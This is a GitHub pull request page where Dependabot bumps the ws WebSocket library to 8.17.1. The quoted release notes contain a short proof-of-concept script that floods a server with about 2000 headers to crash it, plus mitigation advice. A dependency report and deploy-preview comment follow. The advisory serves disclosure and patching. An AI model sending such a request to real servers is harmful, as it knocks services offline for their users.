search

Bedrock-Layouts / Bedrock

Foundational Layout Primitives for your React App
https://bedrock-layout.dev/
MIT License
439 stars 26 forks source link

build(deps): bump ws from 8.17.0 to 8.17.1 #2501

Closed dependabot[bot] closed 1 month ago

dependabot[bot] commented 1 month ago

Bumps ws from 8.17.0 to 8.17.1.

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

  • Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;


for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;


for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';

  if (++count === 2000) break;
}



}


headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';


const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});


request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits
  • 3c56601 [dist] 8.17.1
  • e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
  • 6a00029 [test] Increase code coverage
  • ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
  • See full diff in compare view


Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options
You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot show ignore conditions` will show all of the ignore conditions of the specified dependency - `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Bedrock-Layouts/Bedrock/network/alerts).
socket-security[bot] commented 1 month ago

New and removed dependencies detected. Learn more about Socket for GitHub ↗︎

Package New capabilities Transitives Size Publisher
npm/accepts@1.3.8 None 0 16.8 kB dougwilson
npm/agent-base@7.1.0 network 0 23.5 kB tootallnate
npm/bl@4.1.0 None +3 163 kB matteo.collina
npm/braces@3.0.3 None 0 44.6 kB jonschlinkert
npm/chokidar@3.6.0 environment, filesystem +4 129 kB paulmillr
npm/ci-info@3.9.0 environment 0 26.1 kB sibiraj-s
npm/cli-cursor@3.1.0 None +1 7.19 kB sindresorhus
npm/content-type@1.0.5 None 0 10.5 kB dougwilson
npm/diff-sequences@29.6.3 None 0 46 kB simenb
npm/domhandler@5.0.3 None +1 86.7 kB feedic
npm/dotenv-expand@10.0.0 None 0 13.9 kB motdotla
npm/end-of-stream@1.4.4 None 0 6.23 kB mafintosh
npm/fast-glob@3.3.2 filesystem +1 109 kB mrmlnc
npm/figures@3.2.0 None +1 14.8 kB sindresorhus
npm/fill-range@7.1.1 None +2 49.3 kB jonschlinkert
npm/fsevents@2.3.3 None 0 173 kB pipobscure
npm/get-func-name@2.0.2 None 0 8.68 kB keithamus
npm/has-bigints@1.0.2 None 0 12.8 kB ljharb
npm/has-unicode@2.0.1 environment 0 3.44 kB iarna
npm/iconv-lite@0.4.24 None 0 336 kB ashtuchkin
npm/ini@1.3.8 None 0 9.3 kB isaacs
npm/is-arguments@1.1.1 None 0 28.8 kB ljharb
npm/is-date-object@1.0.5 None 0 20.8 kB ljharb
npm/is-docker@2.2.1 filesystem 0 3.01 kB sindresorhus
npm/is-generator-function@1.0.10 eval 0 31.9 kB ljharb
npm/is-plain-obj@1.1.0 None 0 2.62 kB sindresorhus
npm/is-plain-object@5.0.0 None 0 9.16 kB trysound
npm/is-symbol@1.0.4 None 0 22 kB ljharb
npm/jsonc-parser@3.2.0 None 0 205 kB aeschli
npm/jsonparse@1.3.1 None 0 36.8 kB creationix
npm/kind-of@6.0.3 None 0 22.8 kB doowb
npm/log-symbols@4.1.0 None +1 8.12 kB sindresorhus
npm/merge2@1.4.1 None 0 8.9 kB zensh
npm/micromatch@4.0.5 None 0 55.9 kB jonschlinkert
npm/mime-db@1.52.0 None 0 206 kB dougwilson
npm/mime-types@2.1.35 None 0 18.3 kB dougwilson
npm/min-indent@1.0.1 None 0 2.97 kB thejameskyle
npm/minizlib@2.1.2 None +1 32.1 kB isaacs
npm/negotiator@0.6.3 None 0 27.4 kB dougwilson
npm/neo-async@2.6.2 None 0 298 kB suguru03
npm/normalize-path@3.0.0 None 0 9.22 kB jonschlinkert
npm/p-limit@2.3.0 None +1 11.8 kB sindresorhus
npm/p-map@4.0.0 None +3 25.3 kB sindresorhus
npm/path-scurry@1.10.1 filesystem 0 529 kB isaacs
npm/pathe@1.1.2 None 0 30.8 kB pi0
npm/postcss-value-parser@4.2.0 None 0 27.2 kB evilebottnawi
npm/punycode@2.3.1 None 0 33.5 kB google-wombot
npm/react-is@16.13.1 environment 0 24 kB acdlite
npm/safe-buffer@5.2.1 None 0 32.1 kB feross
npm/safer-buffer@2.1.2 None 0 42.3 kB chalker
npm/set-function-name@2.0.1 None +1 26.9 kB ljharb
npm/signal-exit@3.0.7 None 0 9.96 kB isaacs
npm/slash@3.0.0 None 0 3.51 kB sindresorhus
npm/source-map-js@1.2.0 None 0 140 kB 7rulnik
npm/tar-stream@2.2.0 filesystem +1 29.9 kB mafintosh
npm/through@2.3.8 None 0 12.5 kB dominictarr
npm/type-check@0.4.0 None +1 57.9 kB gkz
npm/type-detect@4.0.8 None 0 42.1 kB chaijs
npm/unpipe@1.0.0 None 0 4.31 kB dougwilson
npm/validate-npm-package-license@3.0.4 None +1 28.4 kB kemitchell
npm/wcwidth@1.0.1 None +2 29.2 kB timoxley
npm/ws@8.17.1 None 0 141 kB lpinca

🚮 Removed packages: npm/@babel/code-frame@7.24.6, npm/@babel/compat-data@7.24.6, npm/@babel/core@7.24.6, npm/@babel/generator@7.24.6, npm/@babel/helper-compilation-targets@7.24.6, npm/@babel/helper-create-class-features-plugin@7.23.10, npm/@babel/helper-create-regexp-features-plugin@7.22.15, npm/@babel/helper-define-polyfill-provider@0.5.0, npm/@babel/helper-environment-visitor@7.24.6, npm/@babel/helper-function-name@7.24.6, npm/@babel/helper-hoist-variables@7.24.6, npm/@babel/helper-member-expression-to-functions@7.23.0, npm/@babel/helper-module-imports@7.24.6, npm/@babel/helper-module-transforms@7.24.6, npm/@babel/helper-plugin-utils@7.22.5, npm/@babel/helper-simple-access@7.24.6, npm/@babel/helper-skip-transparent-expression-wrappers@7.22.5, npm/@babel/helper-split-export-declaration@7.24.6, npm/@babel/helper-string-parser@7.24.6, npm/@babel/helper-validator-identifier@7.24.6, npm/@babel/helper-validator-option@7.24.6, npm/@babel/helpers@7.24.6, npm/@babel/highlight@7.24.6, npm/@babel/parser@7.24.6, npm/@babel/plugin-syntax-jsx@7.23.3, npm/@babel/plugin-transform-class-properties@7.23.3, npm/@babel/plugin-transform-flow-strip-types@7.23.3, npm/@babel/plugin-transform-modules-commonjs@7.23.3, npm/@babel/plugin-transform-nullish-coalescing-operator@7.23.4, npm/@babel/plugin-transform-optional-chaining@7.23.4, npm/@babel/plugin-transform-private-methods@7.23.3, npm/@babel/plugin-transform-react-display-name@7.23.3, npm/@babel/plugin-transform-react-jsx@7.23.4, npm/@babel/preset-typescript@7.23.3, npm/@babel/runtime@7.23.9, npm/@babel/template@7.24.6, npm/@babel/traverse@7.24.6, npm/@babel/types@7.24.6, npm/@eslint-community/regexpp@4.10.0, npm/@floating-ui/utils@0.2.1, npm/@jridgewell/gen-mapping@0.3.3, npm/@radix-ui/react-slot@1.0.2, npm/@storybook/csf@0.1.8, npm/@types/babel__core@7.20.5, npm/@types/babel__traverse@7.20.5, npm/@types/semver@7.5.7, npm/@typescript-eslint/scope-manager@7.12.0, npm/@typescript-eslint/type-utils@7.12.0, npm/@typescript-eslint/types@7.12.0, npm/@typescript-eslint/typescript-estree@7.12.0, npm/@typescript-eslint/utils@7.12.0, npm/@typescript-eslint/visitor-keys@7.12.0, npm/@urql/core@4.2.3, npm/@yarnpkg/libzip@2.3.0, npm/array-includes@3.1.7, npm/array.prototype.flat@1.3.2, npm/array.prototype.flatmap@1.3.2, npm/assert@2.1.0, npm/available-typed-arrays@1.0.6, npm/browserslist@4.23.0, npm/call-bind@1.0.7, npm/caniuse-lite@1.0.30001591, npm/chalk@2.4.2, npm/chromatic@11.5.1, npm/commitizen@4.3.0, npm/concat@1.0.3, npm/core-js-compat@3.35.1, npm/cosmiconfig@8.3.6, npm/cssnano@7.0.1, npm/cz-conventional-changelog@3.3.0, npm/define-data-property@1.1.4, npm/es-abstract@1.22.4, npm/es-shim-unscopables@1.0.2, npm/esbuild@0.20.2, npm/eslint-config-prettier@9.1.0, npm/eslint-config-react-app@7.0.1, npm/eslint-plugin-functional@6.5.1, npm/eslint-plugin-import@2.29.1, npm/eslint-plugin-jsx-a11y@6.8.0, npm/eslint-plugin-prettier@5.1.3, npm/eslint-plugin-react-hooks@4.6.2, npm/eslint-plugin-react@7.34.2, npm/eslint-plugin-storybook@0.8.0, npm/eslint@8.57.0, npm/espree@9.6.1, npm/fs-extra@11.2.0, npm/function.prototype.name@1.1.6, npm/get-intrinsic@1.2.4, npm/glob@10.3.10, npm/has-property-descriptors@1.0.2, npm/hasown@2.0.1, npm/husky@9.0.11, npm/i18next-browser-languagedetector@7.2.1, npm/i18next-http-backend@2.5.2, npm/i18next@23.11.5, npm/import-sort-style-module@6.0.0, npm/inquirer@8.2.5, npm/internal-slot@1.0.7, npm/istanbul-lib-report@3.0.1, npm/istanbul-reports@3.1.6, npm/jsdom@24.1.0, npm/jsonfile@6.1.0, npm/lerna@8.1.3, npm/lilconfig@3.1.1, npm/lint-staged@15.2.5, npm/magic-string@0.30.7, npm/minify@11.2.0, npm/minimatch@3.1.2, npm/minimist@1.2.7, npm/node-fetch@2.7.0, npm/object.assign@4.1.5, npm/object.fromentries@2.0.7, npm/object.values@1.1.7, npm/parse-json@5.2.0, npm/postcss-cli@11.0.0, npm/prettier-plugin-import-sort@0.0.7, npm/prop-types@15.8.1, npm/react-dom@18.3.1, npm/react-i18next@14.1.2, npm/react-test-renderer@18.3.1, npm/recast@0.23.6, npm/rimraf@5.0.7, npm/scheduler@0.20.2, npm/semver@7.6.0, npm/solid-js@1.8.17, npm/solid-styled-components@0.28.5, npm/storybook@8.1.5, npm/styled-components@6.1.11, npm/terser@5.28.1, npm/ts-node@10.9.2, npm/tsconfig-paths@4.2.0, npm/typescript-eslint@7.12.0, npm/v8-to-istanbul@9.2.0, npm/vite-plugin-solid@2.10.2, npm/vite-plugin-turbosnap@1.0.3, npm/vite@5.2.12, npm/vitest@0.34.6

View full report↗︎

netlify[bot] commented 1 month ago

Deploy Preview for admiring-yalow-f522c7 ready!

Name Link
Latest commit 589e73ff85a4c2cf87a138980ffd61b2e3b4e942
Latest deploy log https://app.netlify.com/sites/admiring-yalow-f522c7/deploys/667201f773fd3c00080b2031
Deploy Preview https://deploy-preview-2501--admiring-yalow-f522c7.netlify.app
Preview on mobile
Toggle QR Code...

QR Code

Use your smartphone camera to open QR code link.

To edit notification comments on pull requests, go to your Netlify site configuration.

dependabot[bot] commented 1 month ago

Looks like ws is up-to-date now, so this is no longer needed.